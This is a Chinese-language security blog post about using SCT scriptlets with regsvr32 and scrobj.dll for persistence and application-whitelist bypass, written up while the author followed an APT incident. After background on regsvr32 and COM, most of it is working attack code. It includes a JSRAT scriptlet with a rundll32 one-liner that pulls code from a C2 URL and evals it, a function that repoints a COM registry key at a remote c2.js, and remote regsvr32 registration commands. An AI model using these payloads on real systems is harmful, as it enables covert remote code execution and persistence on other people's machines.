layout: post title: 通过SCT持久化手段 subtitle: SCT date: 2018-12-12 author: DC header-img: img/post-bg-universe.jpg catalog: true tags:

- SCT
- APT

通过SCT持久化手段（跟进密网事件，需要学习的技术点）

跟进密网事件中，其中一个样本采用了sct持久化的方式来进行攻击成功后绕过应用白名单的持久化操作。原文章地址

基础知识

1. regsvr32

regsvr32命令用于注册动态链接库文件。它由Windows提供，通常用于注册或卸载作为命令运行的系统上的控件。

regsvr32 [/u][/s] [/n][/i[:cmdline]] dllname =The dllname is the file name for active controls.

/u
卸载已安装的控件或dll文件
/s
不显示弹窗回显
/n
不调用DllRegisterServer 进行注册，这个命令必须和 /i 一起使用 
/i:cmdline
调用 传递选择的cmdline 给  Dllnstall .和/u 一起使用时 用来卸载DLL
dllname
指定要注册的dll文件名

1. com组件

以动态链接（DLL）或可执行文件（Exe）的形式发布的可执行二进制代码，它满足任何体系结构的所有要求，并且可以通过Regsvr32命令注册。

1. scrobj.dll：发送com请求到脚本组件

例子

1. 例子1

   Component.sct
      
      
   <?XML version="1.0"?>
   <scriptlet>
      
   <registration
       description="Component"
       progid="Component.InsideCOM"
       version="1.00"
       classid="{10001111-0000-0000-0000-000000000001}"
   >
   </registration>
      
   <public>
       <method name="Sum">
           <PARAMETER name="X"/>
           <PARAMETER name="Y"/>
       </method>
   </public>
   <script language="VBScript">
   <![CDATA[
      
   function Sum(X, Y)
       Sum = X + Y
   end function
      
   ]]>
   </script>
      
   </scriptlet>
   

   • regsvr32 /i:”Component.sct” scrobj.dll 管理员权限注册

   id : {10001111-0000-0000-0000-000000000001}
   注册表项：HKEY_CLASSES_ROOTCLSID
   
   [HKCRCLSID{10001111-0000-0000-0000-000000000001}]
   @="Component"
   
   [HKCRCLSID{10001111-0000-0000-0000-000000000001}VersionIndependentProgID]
   @="Component.InsideCOM"
   
   [HKCRCLSID{10001111-0000-0000-0000-000000000001}ProgID]
   @="Component.InsideCOM.1.00"
   
   [HKCRCLSID{10001111-0000-0000-0000-000000000001}ScriptletURL]
   @="file://C:\WINDOWS\Desktop\Component.sct"
   
   [HKCRCLSID{10001111-0000-0000-0000-000000000001}InprocServer32]
   @="C:\WINDOWS\SYSTEM\SCROBJ.DLL"
   "ThreadingModel"="Apartment"
   

   • 使用vbs调用已注册的COM组件

   Dim ref 
   Set ref = CreateObject("Component.InsideCOM")
   MsgBox ref.Sum(4, 6)
   

2. 同样方法利用js 实现

   地址

   <?XML version="1.0"?>
   <scriptlet>
   
   <registration
       description="Component"
       progid="Component.InsideCOMJS"
       version="1.00"
       classid="{10001111-0000-0000-0000-000000000002}"
   >
   </registration>
   
   <public>
       <method name="Sum">
           <PARAMETER name="X"/>
           <PARAMETER name="Y"/>
       </method>
   </public>
   <script language="JScript">
   <![CDATA[
   
   function Sum(X, Y) {
       var result = X + Y;
       return result;
       }
   ]]>
   </script>
   
   </scriptlet>
   

   • js调用

     var ref = new ActiveXObject("Component.InsideCOMJS");
     var x = ref.Sum(4,6);
     WScript.Echo(x);
     

   • 通过更改注册表项值来修改COM组件的内容：

     [HKCRCLSID{10001111-0000-0000-0000-000000000001}ScriptletURL] @=”file://C:\WINDOWS\Desktop\Component.sct”

   • 文件名不一定用sct

     regsvr32 /i:”Component.txt” scrobj.dll

   • 远程服务器存放更改

     regsvr32 /s /i:http://192.168.1.1/Component.txt scrobj.dll

3. JSRAT

   ###  启动代码
      
   ####  sct 文件中 js部分
      
   <?XML version="1.0"?>
   <scriptlet>
      
   <registration
       description="Component"
       progid="JSRAT"
       version="1.01"
       classid="{10001111-0000-0000-0000-0000FEEDACDC}"
   >
   </registration>
      
   <public>
       <method name="Exec"></method>
   </public>
   <script language="JScript">
   <![CDATA[
      	
   	function Exec()
   	{
   		rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
   		new ActiveXObject("WScript.Shell").Run(rat,0,true);
   //		return rat;
   	}
      	
   ]]>
   </script>
      
   </scriptlet>
      
   ###  调用代码
      
   #### js 调用
   test.js:
   var ref = new ActiveXObject("JSRAT");
   ref.Exec();
      
   #### rundll32.exe 方法调用
   rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();x=new%20ActiveXObject("JSRAT");x.Exec();
      
   ### 远程sct 文件注册 
   regsvr32 /s /i:http://192.168.1.1/Backdoor.sct scrobj.dll
      
   

   • demo2

     ###  通过sct 文件远程注册 调用 远程 的 c2.js
     function C2Config() {
         //The default is to use the path to a local file... Here, I just rewrite the regkey, and now, the Class definition comes form the interwebs. Woo!
         var WshShell = new ActiveXObject("WScript.Shell");
         var strRegPath = "HKEY_CLASSES_ROOT\CLSID\{10001111-0000-0000-0000-00000000ACDC}\ScriptletURL\";
         WshShell.RegWrite(strRegPath, "http://127.0.0.1:8080/c2.js", "REG_SZ");
         }
     /*
     function Cleanup() { }
     //Clean your room!
     */ 
     function Main() {
         C2Config();
         //Cleanup();    
         }
          
     ### jsbackdoor 
          
     //call C2Config() from Backdoor.sct and write the path of c2.js to registry
     var x = new ActiveXObject("Component.Backdoor");
     x.Main();
           
     //call the code in c2.js to perform functionalities
     var x = new ActiveXObject("Component.Backdoor");
     x.Exec();
          
     ### 调用方法
     #### rundll32调用
     rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();x=new%20ActiveXObject("Component.Backdoor");x.Exec();
     b.powershell
     #### powershell 调用
     $s=New-Object -COM "Component.Backdoor";$s.Exec()
          
          
     

4. 优化，跳过 sct 中的 exec method 进行执行

   <?XML version="1.0"?>
   <scriptlet>
      
   <registration
       description="Empire"
       progid="Empire"
       version="1.00"
       classid="{20001111-0000-0000-0000-0000FEEDACDC}"
       >
       <!-- regsvr32 /s /i"C:BypassBackdoor.sct" scrobj.dll -->
       <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
       <!-- That should work over a proxy and SSL/TLS... -->
       <!-- Proof Of Concept - Casey Smith @subTee -->
       <script language="JScript">
           <![CDATA[
      
               var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
      
           ]]>
   </script>
   </registration>
      
   <public>
       <method name="Exec"></method>
   </public>
   <script language="JScript">
   <![CDATA[
      
       function Exec()
       {
           var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
       }
      
   ]]>
   </script>
      
   </scriptlet>
      
   #### regsvr32 调用
   regsvr32 /s https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/ca
   /s 忽略错误
      
   ##js 调用
   var ref = new ActiveXObject("Empire");
   var c=ref.Exec();
   

5. 通过卸载控件 来 实现权限绕过

   regsvr32 /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master
   

6. 优化 添加自动识别代理

   <?XML version="1.0"?>
   <scriptlet>
   <registration 
       progid="ShortJSRAT"
       classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
   	<!-- Learn from Casey Smith @subTee -->
   	<script language="JScript">
   		<![CDATA[
      	
   			rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
   		new ActiveXObject("WScript.Shell").Run(rat,0,true);
      	
   		]]>
   </script>
   </registration>
   </scriptlet>
      
   regsvr32 /s /n /u /i:https://goo.gl/ijB12k scrobj.dll  短连接的使用方法
      
   

• Previous
  Infection Monkey蠕虫模拟感染工具
• Next
  APT思路小tips